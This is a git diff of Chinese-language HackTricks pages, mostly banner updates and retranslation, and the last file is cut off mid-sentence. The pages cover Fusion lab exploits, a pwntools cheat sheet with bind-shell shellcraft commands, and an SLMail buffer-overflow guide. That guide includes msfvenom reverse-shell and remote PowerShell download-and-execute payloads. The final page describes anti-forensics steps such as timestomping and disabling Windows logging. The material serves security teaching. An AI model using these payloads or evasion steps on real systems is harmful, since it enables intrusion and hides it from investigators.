-☁️ HackTricks云 ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥 +支持 HackTricks -* 你在一家**网络安全公司**工作吗?想要在HackTricks中看到你的**公司广告**吗?或者想要获得**PEASS的最新版本或下载HackTricks的PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 发现我们的独家[**NFT收藏品The PEASS Family**](https://opensea.io/collection/the-peass-family) -* 获得[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com) -* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram群组**](https://t.me/peass),或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。** -* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。** +* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} ## ## - -
- -☁️ HackTricks云 ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥 - -* 你在一家**网络安全公司**工作吗?想要在HackTricks中看到你的**公司广告**吗?或者想要获得**PEASS的最新版本或下载HackTricks的PDF**吗?请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 发现我们的独家[**NFT收藏品The PEASS Family**](https://opensea.io/collection/the-peass-family) -* 获得[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com) -* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram群组**](https://t.me/peass),或者**关注**我在**Twitter**上的[**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**。** -* **通过向**[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **和** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享你的黑客技巧。** - -
diff --git a/exploiting/linux-exploiting-basic-esp/fusion.md b/exploiting/linux-exploiting-basic-esp/fusion.md index 346dd3a07..288ed657d 100644 --- a/exploiting/linux-exploiting-basic-esp/fusion.md +++ b/exploiting/linux-exploiting-basic-esp/fusion.md @@ -1,23 +1,24 @@ +{% hint style="success" %} +学习并练习AWS黑客技术:[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP黑客技术:[**HackTricks培训GCP红队专家(GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) **和** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github仓库提交PR来分享黑客技巧。**
+{% endhint %} # Level00 [http://exploit-exercises.lains.space/fusion/level00/](http://exploit-exercises.lains.space/fusion/level00/) -1. 获取修改EIP的偏移量 +1. 获取偏移量以修改EIP 2. 将shellcode地址放入EIP ```python from pwn import * @@ -45,24 +46,6 @@ r.send(buf) r.interactive() ``` # Level01 - -## Fusion - -### Basic ESP - -#### Introduction - -In this level, we will be exploiting a basic ESP overwrite vulnerability in the `fusion` binary. The goal is to redirect code execution to the `getpath` function in order to get a shell. - -#### Walkthrough - -1. **Find the Offset**: We will use GDB to find the offset needed to overwrite the return address. Run `gdb fusion` and disassemble the `main` function. Set a breakpoint at the `get` function call and run the binary with a pattern as input. Retrieve the offset using `pattern offset`. - -2. **Craft the Payload**: We will craft a payload that overwrites the return address with the address of the `getpath` function. Use Python to generate the payload and save it to a file. - -3. **Exploit**: Send the payload to the binary using a method of your choice (e.g., input redirection, piping, etc.) and get a shell by redirecting code execution to the `getpath` function. - -By following these steps, you should be able to successfully exploit the basic ESP overwrite vulnerability in the `fusion` binary and gain a shell. ```python from pwn import * @@ -88,16 +71,17 @@ buf += "\x65\xd9\x0f\x01" r.send(buf) r.interactive() ``` +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert) +支持 HackTricks -其他支持HackTricks的方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} diff --git a/exploiting/tools/pwntools.md b/exploiting/tools/pwntools.md index e5ae8346b..466ef0bf3 100644 --- a/exploiting/tools/pwntools.md +++ b/exploiting/tools/pwntools.md @@ -1,27 +1,28 @@ +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -其他支持HackTricks的方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} ``` pip3 install pwntools ``` # Pwn asm -从行或文件获取操作码。 +从一行或文件中获取操作码。 ``` pwn asm "jmp esp" pwn asm -i ``` -**可选项:** +**可以选择:** * 输出类型 (原始,十六进制,字符串,elf) * 输出文件上下文 (16,32,64,linux,windows...) @@ -43,7 +44,7 @@ pwn checksec pwn cyclic 3000 pwn cyclic -l faad ``` -**可选项:** +**可以选择:** * 使用的字母表(默认为小写字符) * 唯一模式的长度(默认为4) @@ -58,13 +59,15 @@ pwn debug --exec /bin/bash pwn debug --pid 1234 pwn debug --process bash ``` -**可选择:** +**可选择的选项:** -* 通过可执行文件、名称或pid上下文(16,32,64,linux,windows...) +* 通过可执行文件、名称或pid上下文(16、32、64位、Linux、Windows...) * 要执行的gdbscript * sysroot路径 -# 禁用二进制文件的nx +# 禁用NX + +禁用二进制文件的NX ``` pwn disablenx ``` @@ -92,7 +95,7 @@ pwn elfdiff ```bash pwn hex hola #Get hex of "hola" ascii ``` -# Pwn phd +# 利用 hexdump 获取十六进制转储 ``` @@ -118,7 +121,7 @@ pwn shellcraft -f hex amd64.linux.sh #Create in C and run pwn shellcraft -r amd64.linux.sh #Run to test. Get shell pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port ``` -**可选项:** +**可以选择:** * shellcode和shellcode的参数 * 输出文件 @@ -126,12 +129,12 @@ pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port * 调试(将dbg附加到shellcode) * 在代码之前设置调试陷阱 * 在代码之后 -* 避免使用操作码(默认: 非空和换行符) +* 避免使用操作码(默认:非空和换行符) * 运行shellcode * 彩色/无彩色 * 列出系统调用 * 列出可能的shellcode -* 生成ELF作为共享库 +* 生成作为共享库的ELF # Pwn模板 @@ -153,16 +156,17 @@ pwn unhex 686f6c61 ``` pwn update ``` +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -其他支持HackTricks的方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} diff --git a/exploiting/windows-exploiting-basic-guide-oscp-lvl.md b/exploiting/windows-exploiting-basic-guide-oscp-lvl.md index b6ebcf509..c35783219 100644 --- a/exploiting/windows-exploiting-basic-guide-oscp-lvl.md +++ b/exploiting/windows-exploiting-basic-guide-oscp-lvl.md @@ -1,24 +1,25 @@ # Windows Exploiting (Basic Guide - OSCP lvl) +{% hint style="success" %} +学习并练习 AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习 GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术 htARTE(HackTricks AWS红队专家) +支持 HackTricks -其他支持HackTricks的方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} -## **开始安装SLMail服务** +## **开始安装 SLMail 服务** -## 重新启动SLMail服务 +## 重新启动 SLMail 服务 -每次需要**重新启动SLMail服务**时,您可以使用Windows控制台执行以下操作: +每次需要**重新启动 SLMail 服务**时,您可以使用 Windows 控制台执行以下操作: ``` net start slmail ``` @@ -66,7 +67,7 @@ print "Could not connect to "+ip+":"+port ## 创建一个模式来修改 EIP -该模式的大小应与先前用于中断服务的缓冲区大小相同。 +该模式的大小应与您先前用于中断服务的缓冲区大小相同。 ![](<../.gitbook/assets/image (26) (1) (1).png>) ``` @@ -86,7 +87,7 @@ print "Could not connect to "+ip+":"+port ``` 看起来**我们可以修改缓冲区中偏移为2606的EIP**。 -检查一下修改漏洞利用的缓冲区: +检查一下修改 exploit 的缓冲区: ``` buffer = 'A'*2606 + 'BBBB' + 'CCCC' ``` @@ -140,13 +141,13 @@ badchars = ( ) buffer = 'A'*2606 + 'BBBB' + badchars ``` -badchars 从 0x01 开始,因为 0x00 几乎总是不好的。 +badchars 从 0x01 开始,因为 0x00 几乎总是有问题。 -重复执行利用程序,使用新的缓冲区删除发现无用的字符:。 +重复执行利用程序,使用这个新的缓冲区删除发现无用的字符:。 例如: -在这种情况下,您可以看到**不应使用字符 0x0A**(因为内存中没有保存字符 0x09)。 +在这种情况下,您可以看到**不应使用字符 0x0A**(因为内存中没有保存任何内容,因为字符 0x09)。 ![](<../.gitbook/assets/image (33) (1).png>) @@ -160,17 +161,17 @@ badchars 从 0x01 开始,因为 0x00 几乎总是不好的。 ``` !mona modules #Get protections, look for all false except last one (Dll of SO) ``` -您将**列出内存映射**。搜索具有以下特征的某些DLL: +你将**列出内存映射**。搜索一些具有以下特征的 DLL: -- **重新基址(Rebase):False** -- **SafeSEH:False** -- **ASLR:False** -- **NXCompat:False** -- **OS DLL:True** +- **Rebase: False** +- **SafeSEH: False** +- **ASLR: False** +- **NXCompat: False** +- **OS Dll: True** ![](<../.gitbook/assets/image (35) (1).png>) -现在,在这段内存中,您应该找到一些JMP ESP字节,为此执行: +现在,在这段内存中,你应该找到一些 JMP ESP 字节,为此执行: ``` !mona find -s "\xff\xe4" -m name_unsecure.dll # Search for opcodes insie dll space (JMP ESP) !mona find -s "\xff\xe4" -m slmfc.dll # Example in this case @@ -179,16 +180,16 @@ badchars 从 0x01 开始,因为 0x00 几乎总是不好的。 ![](<../.gitbook/assets/image (36) (1).png>) -**在这种情况下,例如: \_0x5f4a358f**\_ +**在这种情况下,例如: \_0x5f4a358f**\_ ## 创建 shellcode ``` msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.41 LPORT=443 -f c -b '\x00\x0a\x0d' msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://10.11.0.41/nishang.ps1')\"" -f python -b '\x00\x0a\x0d' ``` -如果利用漏洞没有生效但应该生效(可以通过ImDebg看到已经到达shellcode),尝试创建其他shellcode(msfvenom使用相同参数创建不同的shellcode)。 +如果利用漏洞没有生效但应该生效(可以通过 ImDebg 看到已经到达 shellcode),尝试创建其他 shellcode(使用 msfvenom 为相同参数创建不同的 shellcode)。 -在shellcode开头**添加一些NOPS**,并使用它和返回地址跳转到JMP ESP,完成利用: +在 shellcode 的开头**添加一些 NOPS**,并使用它和返回地址跳转到 JMP ESP,完成利用: ```bash #!/usr/bin/python @@ -247,16 +248,17 @@ print "Could not connect to "+ip+":"+port ``` EXITFUNC=thread -e x86/shikata_ga_nai ``` +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert) +支持 HackTricks -其他支持HackTricks的方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/anti-forensic-techniques.md b/forensics/basic-forensic-methodology/anti-forensic-techniques.md index 611c69aa6..facada831 100644 --- a/forensics/basic-forensic-methodology/anti-forensic-techniques.md +++ b/forensics/basic-forensic-methodology/anti-forensic-techniques.md @@ -1,50 +1,50 @@ +{% hint style="success" %} +学习和实践AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习和实践GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %}
{% embed url="https://websec.nl/" %} - # 时间戳 -攻击者可能对**更改文件的时间戳**感兴趣,以避免被检测到。\ -可以在MFT中的属性`$STANDARD_INFORMATION`和`$FILE_NAME`中找到时间戳。 +攻击者可能有兴趣**更改文件的时间戳**以避免被检测。\ +可以在 MFT 中的属性 `$STANDARD_INFORMATION` 和 `$FILE_NAME` 中找到时间戳。 -这两个属性都有4个时间戳:**修改**,**访问**,**创建**和**MFT注册修改**(MACE或MACB)。 +这两个属性都有 4 个时间戳:**修改**、**访问**、**创建** 和 **MFT 注册修改**(MACE 或 MACB)。 -**Windows资源管理器**和其他工具显示来自**`$STANDARD_INFORMATION`**的信息。 +**Windows 资源管理器**和其他工具显示来自 **`$STANDARD_INFORMATION`** 的信息。 ## TimeStomp - 反取证工具 -该工具**修改**了**`$STANDARD_INFORMATION`**中的时间戳信息,**但没有**修改**`$FILE_NAME`**中的信息。因此,可以**识别**出**可疑活动**。 +该工具**修改**了 **`$STANDARD_INFORMATION`** 中的时间戳信息,**但不会**修改 **`$FILE_NAME`** 中的信息。因此,可以**识别**出**可疑活动**。 ## Usnjrnl -**USN日志**(更新序列号日志)是NTFS(Windows NT文件系统)的一个功能,用于跟踪卷的更改。[**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv)工具允许检查这些更改。 +**USN 日志**(Update Sequence Number Journal)是 NTFS(Windows NT 文件系统)的一个功能,用于跟踪卷的更改。[**UsnJrnl2Csv**](https://github.com/jschicht/UsnJrnl2Csv) 工具允许检查这些更改。 ![](<../../.gitbook/assets/image (449).png>) -上图是该**工具显示的输出**,可以观察到对文件进行了一些**更改**。 +上图是该工具显示的**输出**,可以观察到对文件进行了一些**更改**。 ## $LogFile -**文件系统中的所有元数据更改都会被记录**,这个过程称为[预写式日志记录](https://en.wikipedia.org/wiki/Write-ahead_logging)。记录的元数据保存在名为`**$LogFile**`的文件中,位于NTFS文件系统的根目录中。可以使用诸如[LogFileParser](https://github.com/jschicht/LogFileParser)之类的工具来解析此文件并识别更改。 +**文件系统中的所有元数据更改都会被记录**,这个过程称为[预写式日志记录](https://en.wikipedia.org/wiki/Write-ahead_logging)。记录的元数据保存在名为 `**$LogFile**` 的文件中,位于 NTFS 文件系统的根目录中。可以使用诸如 [LogFileParser](https://github.com/jschicht/LogFileParser) 的工具来解析此文件并识别更改。 ![](<../../.gitbook/assets/image (450).png>) -再次,在工具的输出中,可以看到**进行了一些更改**。 +再次,在工具的输出中可以看到**进行了一些更改**。 使用相同的工具,可以确定**时间戳何时被修改**: @@ -52,112 +52,112 @@ * CTIME:文件的创建时间 * ATIME:文件的修改时间 -* MTIME:文件的MFT注册修改时间 +* MTIME:文件的 MFT 注册修改 * RTIME:文件的访问时间 -## `$STANDARD_INFORMATION`和`$FILE_NAME`比较 +## `$STANDARD_INFORMATION` 和 `$FILE_NAME` 比较 另一种识别可疑修改文件的方法是比较两个属性上的时间,寻找**不匹配**。 ## 纳秒 -**NTFS**时间戳的**精度**为**100纳秒**。因此,找到时间戳为2010-10-10 10:10:**00.000:0000的文件非常可疑**。 +**NTFS** 时间戳的**精度**为**100 纳秒**。因此,找到时间戳为 2010-10-10 10:10:**00.000:0000 的文件非常可疑。 ## SetMace - 反取证工具 -该工具可以修改`$STARNDAR_INFORMATION`和`$FILE_NAME`两个属性。但是,从Windows Vista开始,需要一个实时操作系统来修改此信息。 +该工具可以修改 `$STARNDAR_INFORMATION` 和 `$FILE_NAME` 两个属性。但是,从 Windows Vista 开始,需要一个实时操作系统来修改这些信息。 # 数据隐藏 -NFTS使用一个簇和最小信息大小。这意味着如果一个文件占用一个半簇,**剩余的一半将永远不会被使用**,直到文件被删除。因此,可以**在这个空闲空间中隐藏数据**。 +NFTS 使用一个簇和最小信息大小。这意味着如果一个文件占用一个半簇,**剩余的一半将永远不会被使用**,直到文件被删除。因此,可以**在这个空闲空间中隐藏数据**。 -有一些工具,如slacker,允许在这个“隐藏”空间中隐藏数据。但是,对`$logfile`和`$usnjrnl`的分析可以显示添加了一些数据: +有一些工具如 slacker 允许在这个“隐藏”空间中隐藏数据。然而,对 `$logfile` 和 `$usnjrnl` 的分析可以显示添加了一些数据: ![](<../../.gitbook/assets/image (452).png>) -然后,可以使用FTK Imager等工具检索空闲空间。请注意,这种工具可以保存内容混淆或甚至加密。 +因此,可以使用 FTK Imager 等工具检索空闲空间。请注意,这种工具可以保存内容混淆或甚至加密。 # UsbKill -这是一个工具,如果检测到USB端口发生任何更改,将**关闭计算机**。\ -发现这一点的方法是检查运行中的进程,并**审查每个运行的Python脚本**。 +这是一个工具,如果检测到 USB 端口发生任何更改,将**关闭计算机**。\ +发现这一点的方法是检查运行中的进程并**审查每个运行的 Python 脚本**。 -# 实时Linux发行版 +# 实时 Linux 发行版 -这些发行版是**在RAM内存中执行**的。唯一能够检测到它们的方法是**在NTFS文件系统挂载为可写权限**的情况下。如果只挂载为只读权限,则无法检测到入侵。 +这些发行版是**在 RAM 内存中执行**的。唯一能够检测到它们的方法是**如果 NTFS 文件系统以写权限挂载**。如果只以读权限挂载,将无法检测到入侵。 # 安全删除 [https://github.com/Claudio-C/awesome-data-sanitization](https://github.com/Claudio-C/awesome-data-sanitization) -# Windows配置 +# Windows 配置 -可以禁用几种Windows日志记录方法,使取证调查变得更加困难。 +可以禁用多种 Windows 日志记录方法,使取证调查变得更加困难。 ## 禁用时间戳 - UserAssist 这是一个维护用户运行每个可执行文件的日期和时间的注册表键。 -禁用UserAssist需要两个步骤: +禁用 UserAssist 需要两个步骤: -1. 设置两个注册表键,`HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs`和`HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled`,都设置为零,以表示我们要禁用UserAssist。 -2. 清除类似`HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\`的注册表子树。 +1. 设置两个注册表键,`HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` 和 `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled`,都设置为零,以表示我们要禁用 UserAssist。 +2. 清除类似 `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\` 的注册表子树。 ## 禁用时间戳 - Prefetch -这将保存有关执行的应用程序的信息,目的是提高Windows系统的性能。但是,这也可以用于取证实践。 +这将保存有关执行的应用程序的信息,目的是改善 Windows 系统的性能。但是,这也对取证实践有用。 -* 执行`regedit` -* 选择文件路径`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management\PrefetchParameters` -* 右键单击`EnablePrefetcher`和`EnableSuperfetch` -* 对每个进行修改,将值从1(或3)更改为0 +* 执行 `regedit` +* 选择文件路径 `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\Memory Management\PrefetchParameters` +* 右键单击 `EnablePrefetcher` 和 `EnableSuperfetch` +* 对每个都选择修改,将值从 1(或 3)更改为 0 * 重新启动 ## 禁用时间戳 - 最后访问时间 -每当从Windows NT服务器上的NTFS卷中打开文件夹时,系统会花费时间**更新每个列出文件夹的时间戳字段**,称为最后访问时间。在使用频繁的NTFS卷上,这可能会影响性能。 +每当从 Windows NT 服务器上的 NTFS 卷打开文件夹时,系统会花时间**更新列出的每个文件夹的时间戳字段**,称为最后访问时间。在使用频繁的 NTFS 卷上,这可能会影响性能。 1. 打开注册表编辑器(Regedit.exe)。 -2. 浏览到`HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem`。 -3. 查找`NtfsDisableLastAccessUpdate`。如果不存在,请添加此DWORD并将其值设置为1,以禁用该过程。 +2. 浏览到 `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem`。 +3. 查找 